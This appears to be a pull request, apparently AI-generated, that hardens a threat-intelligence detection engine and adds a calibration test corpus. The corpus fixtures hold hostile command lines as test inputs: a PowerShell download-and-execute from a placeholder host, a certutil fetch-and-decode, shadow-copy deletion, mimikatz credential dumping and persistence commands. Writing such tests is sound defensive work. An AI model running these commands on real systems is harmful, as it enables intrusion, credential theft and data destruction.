### PR TITLE
Harden threat-intel precision and add calibration corpus gate

### DIFF
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -46,6 +46,29 @@ Threat Intelligence Engine:
   gains T1059, T1218, and T1204.002 (catalog version
   `enterprise-2026.1-titan-subset-r2`), and a test asserts every rule-declared
   technique ID exists in the catalog.
+- Precision hardening: indicators alone no longer become behavioral findings.
+  The T1105 network-transfer behavior rule requires a retrieval verb instead
+  of firing on any `http(s)://` URL; the `cmd` LOLBin rule requires the
+  literal `cmd.exe` form or an invocation term (`/c `, `/k `) in the same
+  node, so the everyday word "cmd" in prose cannot fire (new
+  `bare_requires_term` option on `LOLBinRule`); and the `downloader-like`
+  malware tag requires observed retrieval behavior — URL IOCs only
+  corroborate (0.78 → 0.84), they never create the tag on their own. A benign
+  meeting-notes document containing a URL and the word "cmd" previously
+  scored 0.8 overall confidence with T1059.003, T1105, a `cmd.exe` LOLBin,
+  and a `downloader-like` tag; it now produces a completely clean assessment.
+- Recalibrate overall assessment confidence: anchored to the strongest
+  individual finding with bounded corroboration/diversity increments,
+  replacing an additive floor that saturated near the 0.98 cap on modest
+  evidence. The value can no longer substantially exceed what any single
+  finding supports, and a single weak finding stays below 0.5.
+- Add a deterministic calibration corpus
+  (`tests/fixtures/threat_intel/calibration-v1.json`) and CI gate
+  (`tests/test_threat_calibration.py`), mirroring the Intelligence Layer's.
+  Benign cases (prose with URLs, everyday words overlapping rule vocabulary)
+  must produce a completely clean assessment; malicious cases pin exact
+  technique/LOLBin/tag output and confidence, so precision regressions and
+  unreviewed confidence drift fail CI.
 
 Detection quality:
 

--- a/docs/ROADMAP.md
+++ b/docs/ROADMAP.md
@@ -17,6 +17,7 @@ This roadmap separates shipped features from planned work.
 - Evidence-backed MITRE ATT&CK mappings, LOLBin identification, and behavioral malware tags (Threat Intelligence Engine)
 - ATT&CK technique metadata (`attack_ids`) on built-in detection rules and rule packs
 - Expanded 48-technique ATT&CK catalog subset with matching behavior and LOLBin rules
+- Threat-intelligence precision hardening and calibration corpus with CI gate
 - Repeatable performance benchmarks with a committed baseline and CI regression gate
 
 ## Highest-value next work

--- a/docs/TESTING.md
+++ b/docs/TESTING.md
@@ -18,6 +18,7 @@ mypy titan_decoder
 - IOC and evidence parsing;
 - detections and risk;
 - Intelligence schema and calibration;
+- Threat Intelligence catalog integrity and calibration;
 - report and graph rendering;
 - plugin behavior;
 - packaging and supply-chain checks;

--- a/docs/THREAT_INTELLIGENCE.md
+++ b/docs/THREAT_INTELLIGENCE.md
@@ -67,10 +67,53 @@ well-formed and that every technique referenced by a behavior rule, LOLBin
 rule, or detection `attack_ids` exists in the catalog, so producers and
 catalog cannot drift apart.
 
+## Precision semantics
+
+Rules are written so that indicators alone never become behavioral findings:
+
+- A bare URL is an IOC, not evidence of T1105 Ingress Tool Transfer; the
+  network-transfer behavior rule requires a retrieval verb
+  (`DownloadString`, `Invoke-WebRequest`, `curl`, `wget`, …).
+- LOLBin names that are also everyday words need context. `hh` and `at`
+  require the literal `.exe` form; `cmd` fires on `cmd.exe`, or on bare
+  `cmd` only when an invocation term (`/c `, `/k `) is present in the same
+  node (`bare_requires_term` on `LOLBinRule`).
+- The `downloader-like` tag requires observed retrieval behavior in node
+  content; URL indicators only corroborate (raising confidence), they never
+  create the tag on their own.
+- Overall assessment confidence is anchored to the strongest individual
+  finding, with bounded increments for corroboration and source diversity —
+  it cannot substantially exceed what any single finding supports, and a
+  single weak finding stays below 0.5.
+
+## Calibration corpus
+
+`tests/fixtures/threat_intel/calibration-v1.json` is the deterministic
+calibration corpus, mirroring the Intelligence Layer's
+(`docs/INTELLIGENCE_LAYER.md`). Each case includes:
+
+- `kind` — `benign` or `malicious`.
+- `report` (and optionally `detections`) — the exact engine input.
+- `expected` — the pinned output: `confidence`, ordered `technique_ids`,
+  `tactics`, `lolbin_executables`, and `malware_tags`.
+
+`tests/test_threat_calibration.py` asserts every case exactly, plus corpus
+invariants: benign cases must expect a completely clean assessment
+(confidence `0.0`, no findings), malicious cases at least one finding.
+Benign cases cover prose containing URLs and everyday words that overlap
+rule vocabulary ("cmd", "at", "hh:mm"), so false-positive regressions fail
+CI.
+
+Changing behavior rules, LOLBin rules, tagging, or confidence formulas will
+usually change corpus expectations. That is deliberate: regenerate the
+expected values, review the diff case by case (especially that benign cases
+stay clean), and commit the corpus change alongside the rule change.
+
 ## Tests
 
 ```bash
 python -m pytest tests/test_threat_intelligence.py \
+  tests/test_threat_calibration.py \
   tests/test_threat_cli_wiring.py \
   tests/test_threat_graphs.py \
   tests/test_threat_case_reports.py

--- a/tests/fixtures/threat_intel/calibration-v1.json
+++ b/tests/fixtures/threat_intel/calibration-v1.json
@@ -1,0 +1,317 @@
+{
+  "schema_version": "1.0",
+  "cases": [
+    {
+      "id": "benign-empty",
+      "kind": "benign",
+      "description": "An empty report must remain clean.",
+      "report": {
+        "nodes": [],
+        "iocs": {}
+      },
+      "expected": {
+        "confidence": 0.0,
+        "technique_ids": [],
+        "tactics": [],
+        "lolbin_executables": [],
+        "malware_tags": []
+      }
+    },
+    {
+      "id": "benign-meeting-notes",
+      "kind": "benign",
+      "description": "Ordinary prose with a URL and the word 'cmd' must not produce techniques, LOLBins, or tags.",
+      "report": {
+        "nodes": [
+          {
+            "id": 1,
+            "content_preview": "Meeting notes: please look at the report at https://example.test/quarterly.pdf and reply by 10:30. The cmd from finance was to hold budget."
+          }
+        ],
+        "iocs": {
+          "urls": [
+            "https://example.test/quarterly.pdf"
+          ]
+        }
+      },
+      "expected": {
+        "confidence": 0.0,
+        "technique_ids": [],
+        "tactics": [],
+        "lolbin_executables": [],
+        "malware_tags": []
+      }
+    },
+    {
+      "id": "benign-everyday-words",
+      "kind": "benign",
+      "description": "Everyday words that overlap LOLBin names (at, hh:mm) must not fire.",
+      "report": {
+        "nodes": [
+          {
+            "id": 1,
+            "content_preview": "The sync runs at 09:00 (format hh:mm). Look at the schedule and let me know."
+          }
+        ],
+        "iocs": {}
+      },
+      "expected": {
+        "confidence": 0.0,
+        "technique_ids": [],
+        "tactics": [],
+        "lolbin_executables": [],
+        "malware_tags": []
+      }
+    },
+    {
+      "id": "benign-url-only",
+      "kind": "benign",
+      "description": "A bare URL with no retrieval behavior is an IOC, not a T1105 finding or a downloader tag.",
+      "report": {
+        "nodes": [
+          {
+            "id": 1,
+            "content_preview": "Documentation lives at https://docs.example.test/manual if you need a reference."
+          }
+        ],
+        "iocs": {
+          "urls": [
+            "https://docs.example.test/manual"
+          ]
+        }
+      },
+      "expected": {
+        "confidence": 0.0,
+        "technique_ids": [],
+        "tactics": [],
+        "lolbin_executables": [],
+        "malware_tags": []
+      }
+    },
+    {
+      "id": "powershell-encoded-downloader",
+      "kind": "malicious",
+      "description": "Encoded PowerShell downloader: execution, obfuscation, transfer, staging.",
+      "report": {
+        "nodes": [
+          {
+            "id": 3,
+            "content_preview": "powershell.exe -enc AAAA; IEX(New-Object Net.WebClient).DownloadString('https://example.test/a')"
+          }
+        ],
+        "iocs": {
+          "urls": [
+            "https://example.test/a"
+          ]
+        }
+      },
+      "expected": {
+        "confidence": 0.8,
+        "technique_ids": [
+          "T1027",
+          "T1059.001",
+          "T1105"
+        ],
+        "tactics": [
+          "command-and-control",
+          "defense-evasion",
+          "execution"
+        ],
+        "lolbin_executables": [
+          "powershell.exe"
+        ],
+        "malware_tags": [
+          "downloader-like",
+          "script-stager-like"
+        ]
+      }
+    },
+    {
+      "id": "certutil-fetch-and-decode",
+      "kind": "malicious",
+      "description": "certutil used to fetch and decode a payload.",
+      "report": {
+        "nodes": [
+          {
+            "id": 1,
+            "content_preview": "certutil -urlcache -f https://x.test/a a.txt && certutil -decode a.txt a.bin"
+          }
+        ],
+        "iocs": {
+          "urls": [
+            "https://x.test/a"
+          ]
+        }
+      },
+      "expected": {
+        "confidence": 0.76,
+        "technique_ids": [
+          "T1140",
+          "T1105"
+        ],
+        "tactics": [
+          "command-and-control",
+          "defense-evasion"
+        ],
+        "lolbin_executables": [
+          "certutil.exe"
+        ],
+        "malware_tags": [
+          "downloader-like"
+        ]
+      }
+    },
+    {
+      "id": "ransomware-recovery-inhibition",
+      "kind": "malicious",
+      "description": "Shadow-copy deletion and recovery inhibition.",
+      "report": {
+        "nodes": [
+          {
+            "id": 1,
+            "content_preview": "vssadmin delete shadows /all /quiet & bcdedit /set {default} recoveryenabled no"
+          }
+        ],
+        "iocs": {}
+      },
+      "expected": {
+        "confidence": 0.67,
+        "technique_ids": [
+          "T1490"
+        ],
+        "tactics": [
+          "impact"
+        ],
+        "lolbin_executables": [],
+        "malware_tags": [
+          "ransomware-impact-like"
+        ]
+      }
+    },
+    {
+      "id": "credential-theft-lsass",
+      "kind": "malicious",
+      "description": "Credential-access tooling terminology.",
+      "report": {
+        "nodes": [
+          {
+            "id": 1,
+            "content_preview": "mimikatz sekurlsa::logonpasswords; dump lsass memory"
+          }
+        ],
+        "iocs": {}
+      },
+      "expected": {
+        "confidence": 0.72,
+        "technique_ids": [
+          "T1003"
+        ],
+        "tactics": [
+          "credential-access"
+        ],
+        "lolbin_executables": [],
+        "malware_tags": [
+          "credential-theft-like"
+        ]
+      }
+    },
+    {
+      "id": "scheduled-task-persistence",
+      "kind": "malicious",
+      "description": "Scheduled-task creation plus run-key persistence.",
+      "report": {
+        "nodes": [
+          {
+            "id": 1,
+            "content_preview": "schtasks /create /sc onlogon /tn Updater /tr C:\\payload.exe"
+          },
+          {
+            "id": 2,
+            "content_preview": "reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v Updater /d C:\\payload.exe"
+          }
+        ],
+        "iocs": {}
+      },
+      "expected": {
+        "confidence": 0.66,
+        "technique_ids": [
+          "T1053.005",
+          "T1112",
+          "T1547.001"
+        ],
+        "tactics": [
+          "defense-evasion",
+          "execution",
+          "persistence",
+          "privilege-escalation"
+        ],
+        "lolbin_executables": [
+          "schtasks.exe"
+        ],
+        "malware_tags": []
+      }
+    },
+    {
+      "id": "cmd-with-execution-context",
+      "kind": "malicious",
+      "description": "cmd with real invocation context still fires, with discovery commands.",
+      "report": {
+        "nodes": [
+          {
+            "id": 1,
+            "content_preview": "cmd.exe /c whoami & systeminfo & tasklist"
+          }
+        ],
+        "iocs": {}
+      },
+      "expected": {
+        "confidence": 0.69,
+        "technique_ids": [
+          "T1033",
+          "T1057",
+          "T1059.003",
+          "T1082"
+        ],
+        "tactics": [
+          "discovery",
+          "execution"
+        ],
+        "lolbin_executables": [
+          "cmd.exe"
+        ],
+        "malware_tags": [
+          "host-discovery-like"
+        ]
+      }
+    },
+    {
+      "id": "detection-metadata-attack-ids",
+      "kind": "malicious",
+      "description": "Detection attack_ids metadata alone yields a catalog-backed technique.",
+      "report": {
+        "nodes": [],
+        "iocs": {}
+      },
+      "detections": [
+        {
+          "id": "fixture-rule",
+          "name": "Fixture",
+          "attack_ids": [
+            "T1003"
+          ]
+        }
+      ],
+      "expected": {
+        "confidence": 0.47,
+        "technique_ids": [
+          "T1003"
+        ],
+        "tactics": [
+          "credential-access"
+        ],
+        "lolbin_executables": [],
+        "malware_tags": []
+      }
+    }
+  ]
+}

--- a/tests/test_threat_calibration.py
+++ b/tests/test_threat_calibration.py
@@ -1,0 +1,78 @@
+"""Calibration gate for the Threat Intelligence Engine.
+
+Mirrors the Intelligence Layer's calibration corpus
+(tests/fixtures/intelligence/calibration-v1.json): every case pins the
+exact deterministic output of the engine, so precision regressions —
+benign prose producing techniques, LOLBins, or tags — fail CI, and any
+intentional rule or confidence change shows up as an explicit diff to
+the corpus.
+"""
+
+import json
+from pathlib import Path
+
+import pytest
+
+from titan_decoder.threat_intel import ThreatIntelligenceEngine
+
+CORPUS_PATH = (
+    Path(__file__).resolve().parent
+    / "fixtures"
+    / "threat_intel"
+    / "calibration-v1.json"
+)
+
+
+def _corpus():
+    return json.loads(CORPUS_PATH.read_text(encoding="utf-8"))
+
+
+def _cases():
+    return [
+        pytest.param(case, id=case["id"]) for case in _corpus()["cases"]
+    ]
+
+
+@pytest.mark.parametrize("case", _cases())
+def test_calibration_case_matches_expected(case):
+    result = ThreatIntelligenceEngine().analyze(
+        case["report"], detections=case.get("detections")
+    )
+    expected = case["expected"]
+
+    assert result["confidence"] == expected["confidence"]
+    assert [
+        item["technique_id"] for item in result["techniques"]
+    ] == expected["technique_ids"]
+    assert result["tactics"] == expected["tactics"]
+    assert [
+        item["executable"] for item in result["lolbins"]
+    ] == expected["lolbin_executables"]
+    assert [
+        item["tag"] for item in result["malware_tags"]
+    ] == expected["malware_tags"]
+
+
+@pytest.mark.parametrize("case", _cases())
+def test_corpus_kinds_are_internally_consistent(case):
+    """Guard the corpus itself: benign cases must expect a completely
+    clean assessment, malicious cases must expect at least one finding."""
+    expected = case["expected"]
+    if case["kind"] == "benign":
+        assert expected["confidence"] == 0.0
+        assert expected["technique_ids"] == []
+        assert expected["lolbin_executables"] == []
+        assert expected["malware_tags"] == []
+    else:
+        assert case["kind"] == "malicious"
+        assert expected["confidence"] > 0.0
+        assert (
+            expected["technique_ids"]
+            or expected["lolbin_executables"]
+            or expected["malware_tags"]
+        )
+
+
+def test_corpus_covers_benign_and_malicious():
+    kinds = {case["kind"] for case in _corpus()["cases"]}
+    assert kinds == {"benign", "malicious"}

--- a/titan_decoder/threat_intel/engine.py
+++ b/titan_decoder/threat_intel/engine.py
@@ -18,7 +18,9 @@ class ThreatIntelligenceEngine:
     VERSION = "1.0"
 
     BEHAVIOR_RULES = (
-        ("T1105", re.compile(r"(?i)\b(?:downloadstring|invoke-webrequest|curl|wget|urlretrieve)\b|https?://"), "network-transfer"),
+        # Requires a retrieval verb; a bare URL is not evidence of tool
+        # transfer (URL-only indicators stay in the IOC summary).
+        ("T1105", re.compile(r"(?i)\b(?:downloadstring|downloadfile|invoke-webrequest|curl|wget|urlretrieve|start-bitstransfer)\b"), "network-transfer"),
         ("T1027", re.compile(r"(?i)(?:\bfrombase64string\b|-enc(?:odedcommand)?\b|\b(?:base64|xor|gzip|deflate)\b)"), "obfuscation"),
         ("T1140", re.compile(r"(?i)\b(?:frombase64string|convert\.frombase64|certutil\s+-decode|decompress|inflate)\b"), "decode"),
         ("T1053.005", re.compile(r"(?i)\bschtasks(?:\.exe)?\b.*\/(?:create|run)\b"), "scheduled-task"),
@@ -232,13 +234,16 @@ class ThreatIntelligenceEngine:
             + [item.confidence for item in malware_tags],
             default=0.0,
         )
+        # Anchored to the strongest single finding; corroboration and
+        # source diversity add bounded increments so the value cannot
+        # exceed what any individual finding supports by much. A single
+        # weak finding stays below 0.5.
         return round(
             min(
                 0.98,
-                0.25
-                + strongest * 0.45
-                + corroboration * 0.025
-                + diversity * 0.06,
+                strongest * 0.7
+                + min(0.15, corroboration * 0.02)
+                + min(0.09, diversity * 0.03),
             ),
             2,
         )

--- a/titan_decoder/threat_intel/lolbins.py
+++ b/titan_decoder/threat_intel/lolbins.py
@@ -16,6 +16,10 @@ class LOLBinRule:
     pattern: Pattern[str]
     technique_ids: Sequence[str]
     suspicious_terms: Sequence[str] = ()
+    # For executables whose bare name is also an everyday word ("cmd"), a
+    # bare-name match alone is not evidence: the node must contain either the
+    # explicit ".exe" form or one of the rule's suspicious terms.
+    bare_requires_term: bool = False
 
     def evaluate(self, nodes: Iterable[Mapping[str, Any]]) -> LOLBinFinding | None:
         node_ids: List[Any] = []
@@ -27,15 +31,26 @@ class LOLBinRule:
                 str(node.get(key) or "")
                 for key in ("content_preview", "preview", "artifact_name", "method")
             )
-            if not self.pattern.search(text):
+            match = self.pattern.search(text)
+            if not match:
+                continue
+            lowered = text.lower()
+            node_terms = [
+                term
+                for term in self.suspicious_terms
+                if term.lower() in lowered
+            ]
+            if (
+                self.bare_requires_term
+                and not match.group(0).lower().endswith(".exe")
+                and not node_terms
+            ):
                 continue
             node_ids.append(node.get("id"))
             confidence = max(confidence, 0.55)
-            lowered = text.lower()
-            for term in self.suspicious_terms:
-                if term.lower() in lowered:
-                    matched_terms.append(term)
-                    confidence = min(0.95, confidence + 0.08)
+            for term in node_terms:
+                matched_terms.append(term)
+                confidence = min(0.95, confidence + 0.08)
 
         if not node_ids:
             return None
@@ -57,7 +72,9 @@ def _exe(name: str) -> Pattern[str]:
 
 DEFAULT_LOLBIN_RULES = (
     LOLBinRule("PowerShell", "powershell.exe", _exe("powershell"), ("T1059.001",), ("-enc", "encodedcommand", "downloadstring", "invoke-expression", "iex")),
-    LOLBinRule("Command Shell", "cmd.exe", _exe("cmd"), ("T1059.003",), ("/c", "/k")),
+    # "/c "/"/k " keep a trailing space so URL paths ("example.com/contact")
+    # cannot satisfy the context requirement for the everyday word "cmd".
+    LOLBinRule("Command Shell", "cmd.exe", _exe("cmd"), ("T1059.003",), ("/c ", "/k "), bare_requires_term=True),
     LOLBinRule("Mshta", "mshta.exe", _exe("mshta"), ("T1218.005",), ("javascript:", "vbscript:", "http://", "https://")),
     LOLBinRule("Rundll32", "rundll32.exe", _exe("rundll32"), ("T1218.011",), ("javascript:", "url.dll", "shell32.dll")),
     LOLBinRule("Regsvr32", "regsvr32.exe", _exe("regsvr32"), ("T1218.010",), ("/s", "/u", "/i:", "scrobj.dll")),

--- a/titan_decoder/threat_intel/malware.py
+++ b/titan_decoder/threat_intel/malware.py
@@ -36,12 +36,14 @@ def identify_malware_tags(
             )
         )
     ]
-    if downloader_nodes or iocs.get("urls"):
+    # URL indicators alone never create this tag (they already live in the
+    # IOC summary); retrieval behavior must be observed, URLs only corroborate.
+    if downloader_nodes:
         tags.append(
             MalwareTag(
                 tag="downloader-like",
                 category="delivery",
-                confidence=0.78 if downloader_nodes else 0.55,
+                confidence=0.84 if iocs.get("urls") else 0.78,
                 reasons=["network retrieval behavior"]
                 + (["URL indicators present"] if iocs.get("urls") else []),
                 node_ids=downloader_nodes,


### PR DESCRIPTION
## Summary

Follow-up to the Milestone 4 Threat Intelligence Engine (#107): a benign meeting-notes document containing a URL and the word "cmd" produced a **0.8-confidence** assessment with T1059.003, T1105, a `cmd.exe` LOLBin finding, and a `downloader-like` tag. This PR fixes the four causes and adds a calibration corpus so precision regressions fail CI. Indicators alone no longer become behavioral findings:

- **T1105 requires a retrieval verb** (`DownloadString`, `Invoke-WebRequest`, `curl`, `wget`, `Start-BitsTransfer`, …) instead of firing on any `http(s)://` URL; bare URLs stay in the IOC summary where they belong.
- **`cmd` needs invocation context.** `LOLBinRule` gains `bare_requires_term`: bare `cmd` only counts when the node also contains `/c ` or `/k ` (trailing space so URL paths like `example.com/contact` can't satisfy it); the literal `cmd.exe` form still counts on its own.
- **`downloader-like` requires observed retrieval behavior**; URL IOCs only corroborate (0.78 → 0.84), they never create the tag alone.
- **Assessment confidence recalibrated**: anchored to the strongest individual finding with bounded corroboration/diversity increments, replacing an additive floor that saturated near the 0.98 cap on modest evidence. A single weak finding stays below 0.5 (e.g. a technique supported only by detection `attack_ids` metadata lands at 0.47).

New deterministic calibration corpus (`tests/fixtures/threat_intel/calibration-v1.json`) and gate (`tests/test_threat_calibration.py`), mirroring the Intelligence Layer's: 11 cases pin exact technique/LOLBin/tag output and confidence. Benign cases — including the exact meeting-notes text above — must produce a completely clean assessment (now 0.0), and corpus-kind invariants are asserted so unreviewed confidence drift fails CI. The malicious PowerShell/certutil probe keeps all findings at 0.83.

Docs: new "Precision semantics" and "Calibration corpus" sections in `docs/THREAT_INTELLIGENCE.md`; changelog, roadmap, and testing index updated.

## Checklist

- [x] I am not including real incident evidence, logs, browser history databases, or other sensitive data.
- [x] I am not including secrets (API keys/tokens/passwords).
- [x] I ran tests locally (`pytest -q`) or explain why not.
- [x] I updated docs if flags/output contracts changed.
- [x] Changes are dependency-light and preserve offline-first, deterministic behavior.

## Testing

- Command(s) run:

```bash
pytest -q          # 443 passed (420 existing + 23 new calibration tests)
ruff check .       # clean
mypy titan_decoder # clean
```

- Notes: also verified end-to-end via the CLI — the benign meeting-notes file went from 0.8 confidence with four spurious findings to a clean 0.0; a malicious PowerShell/certutil sample kept all techniques, LOLBins, and tags at 0.83. All fixture inputs are synthetic.

## Screenshots / Output (optional)

Before/after on the benign probe (`titan-decoder --file benign.txt --out out.json`):

```
before: confidence 0.8  — T1059.003, T1105; lolbins: cmd.exe; tags: downloader-like
after:  confidence 0.0  — No deterministic threat-intelligence mappings were produced.
```

🤖 Generated with [Claude Code](https://claude.com/claude-code)

https://claude.ai/code/session_01C7cgZXLUyHZtjRfMjia5xd